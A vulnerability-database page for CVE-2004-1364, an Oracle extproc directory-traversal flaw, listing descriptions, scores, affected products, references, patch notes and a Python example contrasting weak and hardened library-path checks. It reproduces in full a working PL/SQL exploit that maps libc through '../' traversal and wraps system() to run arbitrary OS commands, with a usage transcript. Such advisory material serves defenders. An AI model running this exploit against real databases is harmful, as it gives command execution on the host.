CVE-2004-1364
CVSS 8.5
Published: 2004-08-04 00:00:00
Revised: 2016-10-17 22:53:32

[Original text] Directory traversal vulnerability in extproc in Oracle 9i and 10g allows remote attackers to access arbitrary libraries outside of the $ORACLE_HOME\bin directory.


[CNNVD] Oracle extproc directory traversal vulnerability (CNNVD-200408-009)

        Oracle Database is a large commercial database system.
        Oracle 10g extproc has a directory traversal issue; a remote attacker can exploit it to bypass the directory restriction and access other libraries.
        extproc verifies that a library lies in the '$ORACLE_HOME\bin' directory, mainly so that external libraries cannot be loaded, but a directory traversal issue lets an attacker bypass this restriction and reach libraries such as libc and msvcrt.dll; by calling the system() function, arbitrary OS commands can be executed.


- CVSS (base score)

CVSS score: 8.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (weakness category)

CWE-22 [Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)]

- CPE (affected platforms and products)

cpe:/a:oracle:oracle10g:standard_10.1_.0.2
cpe:/a:oracle:oracle9i:client_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0
cpe:/a:oracle:oracle9i:client_9.2.0.2
cpe:/a:oracle:oracle9i:standard_8.1.7
cpe:/a:oracle:oracle9i:standard_9.2
cpe:/a:oracle:oracle9i:standard_9.2.0.2
cpe:/a:oracle:oracle9i:standard_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.2.0.4
cpe:/a:oracle:oracle9i:standard_9.2.0.3
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.0.0
cpe:/a:oracle:oracle8i:standard_8.0.6_.3
cpe:/a:oracle:oracle10g:standard_9.0.4_.0
cpe:/a:oracle:oracle9i:standard_9.2.0.5
cpe:/a:oracle:application_server (Oracle Application Server)
cpe:/a:oracle:enterprise_manager:9.0.1 (Oracle Enterprise Manager 9.0.1)
cpe:/a:oracle:enterprise_manager_grid_control:10.1.0.2 (Oracle Enterprise Manager Grid Control 10g 10.1.0.2)
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.1
cpe:/a:oracle:oracle9i:enterprise_9.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0
cpe:/a:oracle:application_server:9.0.4 (Oracle Oracle10g Application Server 9.0.4)
cpe:/a:oracle:application_server:9.0.3 (Oracle Oracle9i Application Server 9.0.3)
cpe:/a:oracle:application_server:9.0.3.1 (Oracle Application Server 10g 9.0.3.1)
cpe:/a:oracle:oracle8i:standard_8.0.6
cpe:/a:oracle:oracle8i:enterprise_8.0.5_.0.0
cpe:/a:oracle:application_server:9.0.2.0.1 (Oracle Oracle9i Application Server 9.0.2.0.1)
cpe:/a:oracle:application_server:9.0.2.0.0 (Oracle Oracle9i Application Server 9.0.2.0.0)
cpe:/a:oracle:oracle10g:enterprise_9.0.4_.0
cpe:/a:oracle:oracle9i:standard_9.0.1.3
cpe:/a:oracle:oracle9i:standard_9.0.1.2
cpe:/a:oracle:oracle9i:standard_9.0.1.5
cpe:/a:oracle:oracle9i:standard_9.0.1.4
cpe:/a:oracle:e-business_suite:11.5.4 (Oracle E-Business Suite 11i 11.5.4)
cpe:/a:oracle:e-business_suite:11.5.6 (Oracle E-Business Suite 11i 11.5.6)
cpe:/a:oracle:oracle9i:personal_9.0.1
cpe:/a:oracle:e-business_suite:11.5.3 (Oracle E-Business Suite 11i 11.5.3)
cpe:/a:oracle:collaboration_suite:release_1
cpe:/a:oracle:oracle10g:personal_9.0.4_.0
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7_.0.0
cpe:/a:oracle:oracle9i:personal_8.1.7
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.1.0
cpe:/a:oracle:oracle9i:personal_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2.0.5
cpe:/a:oracle:oracle9i:personal_9.2.0.2
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.0.0
cpe:/a:oracle:oracle9i:personal_9.2.0.3
cpe:/a:oracle:e-business_suite:11.5.1 (Oracle E-Business Suite 11i 11.5.1)
cpe:/a:oracle:oracle9i:enterprise_9.0.1.4
cpe:/a:oracle:oracle9i:enterprise_9.0.1.5
cpe:/a:oracle:oracle9i:enterprise_8.1.7
cpe:/a:oracle:e-business_suite:11.5.5 (Oracle E-Business Suite 11i 11.5.5)
cpe:/a:oracle:e-business_suite:11.5.2 (Oracle E-Business Suite 11i 11.5.2)
cpe:/a:oracle:e-business_suite:11.5.9 (Oracle E-Business Suite 11i 11.5.9)
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.1.0
cpe:/a:oracle:enterprise_manager_database_control:10.1.2 (Oracle Enterprise Manager Database Control 10g 10.1.2)
cpe:/a:oracle:e-business_suite:11.5.8 (Oracle E-Business Suite 11i 11.5.8)
cpe:/a:oracle:oracle8i:enterprise_8.1.7_.4
cpe:/a:oracle:e-business_suite:11.5.7 (Oracle E-Business Suite 11i 11.5.7)
cpe:/a:oracle:oracle8i:standard_8.1.7_.1
cpe:/a:oracle:oracle8i:standard_8.1.7_.4
cpe:/a:oracle:oracle9i:standard_9.0.2
cpe:/a:oracle:oracle9i:personal_9.2.0.1
cpe:/a:oracle:oracle9i:standard_9.0.1
cpe:/a:oracle:enterprise_manager:9 (Oracle Enterprise Manager 9.0i)
cpe:/a:oracle:application_server:9.0.2.1 (Oracle Oracle10g Application Server 9.0.2.1)
cpe:/a:oracle:application_server:9.0.2.2 (Oracle Oracle9i Application Server 9.0.2.2)
cpe:/a:oracle:application_server:9.0.4.0 (Oracle Oracle10g Application Server 9.0.4.0)
cpe:/a:oracle:oracle10g:enterprise_10.1.0.2
cpe:/a:oracle:oracle8i:standard_8.1.7
cpe:/a:oracle:application_server:9.0.2.3 (Oracle Application Server 10g 9.0.2.3)
cpe:/a:oracle:application_server:9.0.4.1 (Oracle Application Server 10g 9.0.4.1)
cpe:/a:oracle:oracle8i:enterprise_8.1.5_.1.0
cpe:/a:oracle:oracle8i:standard_8.1.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.5
cpe:/a:oracle:oracle9i:enterprise_9.2.0.1
cpe:/a:oracle:oracle9i:enterprise_9.2.0.2
cpe:/a:oracle:oracle9i:enterprise_9.2.0.3
cpe:/a:oracle:oracle9i:enterprise_9.2.0.4
cpe:/a:oracle:oracle9i:personal_9.2
cpe:/a:oracle:oracle8i:standard_8.1.6
cpe:/a:oracle:oracle8i:enterprise_8.0.6_.0.0
cpe:/a:oracle:oracle8i:enterprise_8.1.6_.0.0
cpe:/a:oracle:oracle9i:personal_9.0.1.5
cpe:/a:oracle:application_server:9.0.2 (Oracle Application Server 9i 9.0.2)
cpe:/a:oracle:oracle10g:personal_10.1_.0.2
cpe:/a:oracle:oracle9i:personal_9.0.1.4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1364
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1364
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-009
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110382406002365&w=2
(UNKNOWN)  BUGTRAQ  20041223 Oracle extproc directory traversal (#NISR23122004B)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101782-1
(UNKNOWN)  SUNALERT  101782
http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
(UNKNOWN)  MISC  http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
http://www.kb.cert.org/vuls/id/316206
(UNKNOWN)  CERT-VN  VU#316206
http://www.ngssoftware.com/advisories/oracle23122004B.txt
(VENDOR_ADVISORY)  MISC  http://www.ngssoftware.com/advisories/oracle23122004B.txt
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
(VENDOR_ADVISORY)  CONFIRM  http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
http://www.securityfocus.com/archive/1/archive/1/454861/100/0/threaded
(UNKNOWN)  BUGTRAQ  20061219 Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
http://www.securityfocus.com/bid/10871
(PATCH)  BID  10871
http://www.us-cert.gov/cas/techalerts/TA04-245A.html
(VENDOR_ADVISORY)  CERT  TA04-245A
http://xforce.iss.net/xforce/xfdb/18658
(PATCH)  XF  oracle-extproc-directory-traversal(18658)

- Vulnerability information

Oracle extproc directory traversal vulnerability
High risk  Unknown
2004-08-04 00:00:00 2006-08-30 00:00:00
Remote

        Oracle Database is a large commercial database system.
        Oracle 10g extproc has a directory traversal issue; a remote attacker can exploit it to bypass the directory restriction and access other libraries.
        extproc verifies that a library lies in the '$ORACLE_HOME\bin' directory, mainly so that external libraries cannot be loaded, but a directory traversal issue lets an attacker bypass this restriction and reach libraries such as libc and msvcrt.dll; by calling the system() function, arbitrary OS commands can be executed.
        
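Added example (not from this page's sources and not Oracle's code): a Python comparison of the two kinds of library-path check the description contrasts, a raw string-prefix test against $ORACLE_HOME/bin and a containment test on the normalised path. That the original extproc check was a plain prefix comparison is an assumption; the page only says extproc verifies the library lies in $ORACLE_HOME\bin. ORACLE_HOME=/opt/oracle follows the usage transcript in the exploit record on this page; POSIX path syntax, the sample library specs and the function names (expand, prefix_check, containment_check, audit) are constructed for this example.

```python
import posixpath

# Constructed values for this example. ORACLE_HOME matches the value shown in the
# exploit's usage transcript on this page; POSIX path syntax is assumed throughout
# (the Windows variant with msvcrt.dll would need ntpath semantics instead).
ORACLE_HOME = "/opt/oracle"
ALLOWED_DIR = posixpath.join(ORACLE_HOME, "bin")

# Constructed test inputs: the first is the traversal path quoted in the advisory's
# exploit, the rest are benign or near-miss specs a reviewer would want covered.
SAMPLE_SPECS = [
    "$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1",
    "$ORACLE_HOME/bin/libmyext.so",
    "$ORACLE_HOME/bin/./subdir/libother.so",
    "$ORACLE_HOME/binx/libevil.so",
    "/lib/64/libc.so.1",
]


def expand(lib_spec: str) -> str:
    """Substitute the $ORACLE_HOME placeholder used in CREATE LIBRARY specs."""
    return lib_spec.replace("$ORACLE_HOME", ORACLE_HOME)


def prefix_check(lib_path: str) -> bool:
    """Assumed shape of a bypassable check (the page only says extproc 'validates'
    the directory): a string-prefix test on the raw path. '..' is never resolved,
    so anything that merely starts with $ORACLE_HOME/bin/ is accepted."""
    return lib_path.startswith(ALLOWED_DIR + "/")


def containment_check(lib_path: str) -> bool:
    """Hardened form: normalise the path first (collapsing '.' and '..'), then
    require the allowed directory to be a true ancestor of the result.
    Symlinks are not resolved here; on a live filesystem use os.path.realpath."""
    allowed = posixpath.normpath(ALLOWED_DIR)
    candidate = posixpath.normpath(lib_path)
    if not posixpath.isabs(candidate):
        return False  # relative specs are rejected outright
    # commonpath compares whole components, so /opt/oracle/binx is not a match
    return posixpath.commonpath([allowed, candidate]) == allowed and candidate != allowed


def audit(specs) -> list:
    """Evaluate each spec under both policies; returns (expanded_path, prefix_ok,
    containment_ok) tuples so the two checks can be compared side by side."""
    results = []
    for spec in specs:
        path = expand(spec)
        results.append((path, prefix_check(path), containment_check(path)))
    return results


if __name__ == "__main__":
    for path, weak, strong in audit(SAMPLE_SPECS):
        verdict = "ESCAPES bin" if weak and not strong else ("ok" if strong else "rejected")
        print(f"{verdict:12} prefix={weak!s:5} contained={strong!s:5} {path}")
```

Run stand-alone, the script prints one verdict per spec: the advisory's traversal path passes the prefix test but fails containment because it normalises to /lib/64/libc.so.1, while /opt/oracle/binx/libevil.so is rejected by both (commonpath works on whole path components, not characters). The same normalise-then-compare pattern is what an auditor would apply to existing CREATE LIBRARY definitions when checking an instance that cannot yet take the vendor patch.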

- Advisories and patches

        Vendor patch:
        Oracle
        ------
        Oracle has released patch (#68) to fix this vulnerability:
        
        http://metalink.oracle.com/

- Vulnerability information (2951)

Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit (EDBID:2951)
multiple remote
2006-12-19 Verified
0 Marco Ivaldi
N/A
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g 
-- allows remote attackers to access arbitrary libraries outside of the 
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS 
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also: 
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to 
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
	procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell32
	language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
	procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
	procedure exec(cmdstring in char)
	is external
	name "system"
	library exec_shell64
	language c;
end oracmd64;
/

-- milw0rm.com [2006-12-19]
		

- Vulnerability information (24353)

Oracle 9i Multiple Unspecified Vulnerabilities (EDBID:24353)
unix remote
2004-08-04 Verified
0 Marco Ivaldi
N/A
source: http://www.securityfocus.com/bid/10871/info

Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities. 

The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others. 

There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending. 

Note that a number of unsupported versions of affected products may also potentially be vulnerable.


- Vulnerability information (F53183)

raptor_oraextproc.sql.txt (PacketStormID:F53183)
2006-12-22 00:00:00
Marco Ivaldi  
exploit,arbitrary
CVE-2004-1364

This PL/SQL code exploits the Oracle extproc directory traversal bug to remotely execute arbitrary OS commands with the privileges of the DBMS user. All versions of Oracle 9i are susceptible. Oracle 10g versions prior to 10.1.0.3 are susceptible.


- Vulnerability information

12744
Oracle extproc Function Traversal Arbitrary Library Access
Input Manipulation
Vendor Verified

- Vulnerability description

- Timeline

2004-12-23 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Oracle Multiple Unspecified Vulnerabilities
Unknown 10871
Yes No
2004-08-04 12:00:00 2006-12-19 06:37:00
David Litchfield, Michael Litchfield, Cesar Cerrudo, Esteban Martinez Fayo, Pete Finnigan, Jonathan Gennick, Alexander Kornbrust, Stephen Kost, Matt Moore, Aaron Newman, Andy Rees, and Christian Schaller, are credited for the discovery of these vulnerabili

- Affected program versions

Sun SunMC 3.5 update 1a
Sun SunMC 3.5 update 1
Oracle Oracle9i Standard Edition 9.2 .3
Oracle Oracle9i Standard Edition 9.2 .0.5
Oracle Oracle9i Standard Edition 9.2 .0.3
Oracle Oracle9i Standard Edition 9.2 .0.2
Oracle Oracle9i Standard Edition 9.2 .0.1
Oracle Oracle9i Standard Edition 9.2
Oracle Oracle9i Standard Edition 9.0.2
Oracle Oracle9i Standard Edition 9.0.1 .5
Oracle Oracle9i Standard Edition 9.0.1 .4
Oracle Oracle9i Standard Edition 9.0.1 .3
Oracle Oracle9i Standard Edition 9.0.1 .2
Oracle Oracle9i Standard Edition 9.0.1
Oracle Oracle9i Standard Edition 9.0 .2.4
Oracle Oracle9i Standard Edition 9.0
Oracle Oracle9i Standard Edition 8.1.7
Oracle Oracle9i Personal Edition 9.2 .0.5
Oracle Oracle9i Personal Edition 9.2 .0.3
Oracle Oracle9i Personal Edition 9.2 .0.2
Oracle Oracle9i Personal Edition 9.2 .0.1
Oracle Oracle9i Personal Edition 9.2
Oracle Oracle9i Personal Edition 9.0.1 .5
Oracle Oracle9i Personal Edition 9.0.1 .4
Oracle Oracle9i Personal Edition 9.0.1
Oracle Oracle9i Personal Edition 9.0 .2.4
Oracle Oracle9i Personal Edition 8.1.7
Oracle Oracle9i Lite 5.0 .2.9.0
Oracle Oracle9i Lite 5.0 .2.0.0
Oracle Oracle9i Lite 5.0 .1.0.0
Oracle Oracle9i Lite 5.0 .0.0.0
Oracle Oracle9i Enterprise Edition 9.2 .2
Oracle Oracle9i Enterprise Edition 9.2 .0.5
Oracle Oracle9i Enterprise Edition 9.2 .0.3
Oracle Oracle9i Enterprise Edition 9.2 .0.1
Oracle Oracle9i Enterprise Edition 9.2 .0
Oracle Oracle9i Enterprise Edition 9.0.1 .5
Oracle Oracle9i Enterprise Edition 9.0.1 .4
Oracle Oracle9i Enterprise Edition 9.0.1
Oracle Oracle9i Enterprise Edition 9.0 .2.4
Oracle Oracle9i Enterprise Edition 8.1.7
Oracle Oracle9i Client Edition 9.2 .0.2
Oracle Oracle9i Client Edition 9.2 .0.1
Oracle Oracle9i Application Server Web Cache 9.0.3 .1
Oracle Oracle9i Application Server Web Cache 9.0.2 .3
Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+ Oracle iStore 11i 11i.IBE.O
Oracle Oracle9i Application Server Reports 9.0.2 .1
Oracle Oracle9i Application Server Reports 9.0.2
Oracle Oracle9i Application Server Portal 9.0.2 .3B
Oracle Oracle9i Application Server Portal 9.0.2 .3A
+ Oracle Oracle9i Application Server 9.0.2 .2
Oracle Oracle9i Application Server Portal 9.0.2 .3
Oracle Oracle9i Application Server 9.0.3 .1
Oracle Oracle9i Application Server 9.0.3
Oracle Oracle9i Application Server 9.0.2 .3
Oracle Oracle9i Application Server 9.0.2 .2
Oracle Oracle9i Application Server 9.0.2 .1
Oracle Oracle9i Application Server 9.0.2 .0.1
Oracle Oracle9i Application Server 9.0.2 .0.0
Oracle Oracle9i Application Server 9.0.2
Oracle Oracle9i Application Server
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Standard Edition 8.0.6 .3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7 .4.0
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Enterprise Edition 8.0.6 .0.1
Oracle Oracle8i Enterprise Edition 8.0.6 .0.0
Oracle Oracle8i Enterprise Edition 8.0.5 .0.0
Oracle Oracle8 8.1.7
- Microsoft Windows 2000 Professional
Oracle Oracle8 8.1.6
Oracle Oracle8 8.1.5
Oracle Oracle8 8.0.6
Oracle Oracle8 8.0.5 .1
Oracle Oracle8 8.0.5
- SGI IRIX 6.5.4
Oracle Oracle8 8.0.4
Oracle Oracle8 8.0.3
Oracle Oracle8 8.0.2
Oracle Oracle8 8.0.1
- HP HP-UX 11.0
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
Oracle Oracle10g Standard Edition 10.1 .0.2
Oracle Oracle10g Standard Edition 9.0.4 .0
Oracle Oracle10g Personal Edition 10.1 .0.2
Oracle Oracle10g Personal Edition 9.0.4 .0
Oracle Oracle10g Enterprise Edition 10.1 .0.2
Oracle Oracle10g Enterprise Edition 9.0.4 .0
Oracle Oracle10g Application Server 10.1 .0.2
Oracle Oracle10g Application Server 9.0.4 .0
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle 9i Application Server Release 1 1.0.2 .2
Oracle listener 8.1.6
Oracle listener 8.0.6
Oracle Label Security 9.0.1
+ Oracle Oracle9i Standard Edition 9.0.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Oracle Label Security 8.1.7
Oracle iStore 11i 11i.IBE.O
Oracle Files 9.0.3 .3.6
Oracle Files 9.0.3 .3.0
+ Oracle Collaboration Suite Release 1
Oracle Files 9.0.3 .2.0
+ Oracle Collaboration Suite Release 1
Oracle Files 9.0.3 .1.0
+ Oracle Collaboration Suite Release 1
Oracle Enterprise Manager Grid Control 10g 10.1 .0.2
Oracle Enterprise Manager Database Control 10g 10.1 .0.2
Oracle Enterprise Manager 9.0.1
Oracle Enterprise Manager 9.0 i
Oracle E-Business Suite 11i 11.8
Oracle E-Business Suite 11i 11.7
Oracle E-Business Suite 11i 11.6
Oracle E-Business Suite 11i 11.5.9
Oracle E-Business Suite 11i 11.5.8
Oracle E-Business Suite 11i 11.5.7
Oracle E-Business Suite 11i 11.5.6
Oracle E-Business Suite 11i 11.5.5
Oracle E-Business Suite 11i 11.5.4
Oracle E-Business Suite 11i 11.5.3
Oracle E-Business Suite 11i 11.5.2
Oracle E-Business Suite 11i 11.5.1
Oracle E-Business Suite 11i 11.5
Oracle E-Business Suite 11i 11.4
Oracle E-Business Suite 11i 11.3
Oracle E-Business Suite 11i 11.2
Oracle E-Business Suite 11i 11.1
Oracle E-Business Suite 11.0
Oracle E-Business Suite 10.7
Oracle Configurator 11.0 i
Oracle Collaboration Suite Release 1
Oracle Applications 11.0
Oracle Applications 10.7
Oracle Application Server Web Cache 10g 9.0.4 .0
+ Oracle Oracle10g Application Server 9.0.4 .0
Oracle Application Server 10g 9.0.4 .1
Oracle Application Server 10g 9.0.4

- Vulnerability discussion

Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities.

The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others.

There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending.

Note that a number of unsupported versions of affected products may also potentially be vulnerable.

- Exploit

Private exploits reportedly exist for many of these vulnerabilities.

The following exploit demonstrates CVE-2004-1364, the directory-traversal vulnerability in 'extproc':

- Solution

Oracle has released an alert (#68) and a patch to address these issues.

NOTE: A message from David Litchfield <davidl@ngssoftware.com> states that some of the vulnerabilities in alert #68 may not have been successfully fixed by Oracle. Users of affected packages should refer to the referenced message and contact their vendor for further information on the status of fixes.

- References
